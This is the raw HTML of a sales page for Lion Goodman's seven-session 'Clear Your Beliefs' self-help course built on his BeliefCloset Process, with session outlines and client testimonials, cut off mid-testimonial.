/></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="173" height="130" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. 